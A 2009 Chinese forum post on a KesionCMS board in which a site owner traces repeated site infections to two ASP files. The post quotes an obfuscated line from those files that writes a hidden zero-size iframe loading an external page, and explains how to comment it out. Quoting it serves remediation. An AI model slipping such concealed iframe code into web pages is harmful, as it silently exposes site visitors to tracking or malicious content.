账号通
    

账号  

密码  

1833

查看

0

回复
主题:发现了挂马的漏洞关键在哪了!初步处理方案 [收藏主题]  
linzi1688 当前离线

376

主题

0

广播

2

粉丝
添加关注
级别:三年级

用户积分:3385 分
登录次数:217 次
注册时间:2006/8/21
最后登录:2022/3/9
linzi1688 发表于:2009/10/2 11:40:00   | 只看该作者 查看该作者主题 楼主 

本来昨天都已经清楚了到晚上的时候又被全部挂了
后来分析了下其他代码确实没有发现任何可以植入的
后来发现关键在于:
1、在线升级上,删除在线升级文件里头的内容!变成一个空文件夹!
2、打开GL目录文件夹下的
index.asp   KS.UpFileForm.asp

  .Write " <ifr" & "ame src=""http://ww" &"w.k" &"e" & "si" &"on." & "co" & "m" & "/WebS" & "ystem/Co" & "unt.asp"" scrolling='no' frameborder='0' height='0' width='0'></iframe>"

变成:
 ‘ .Write " <ifr" & "ame src=""http://ww" &"w.k" &"e" & "si" &"on." & "co" & "m" & "/WebS" & "ystem/Co" & "unt.asp"" scrolling='no' frameborder='0' height='0' width='0'></iframe>"

即前面加一个单引号或者直接删除这句


试了这样处理完后今天的这个处理的网站没有再被挂上

其他两个网站没有这样处理的今天早上又被挂上!

希望引起官方注意下看是不是这两个文件有问题了!
我也一直在关注着看有没有其他办法
一有办法一定在此与大家共享!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.04688秒 powered by KesionCMS 9.0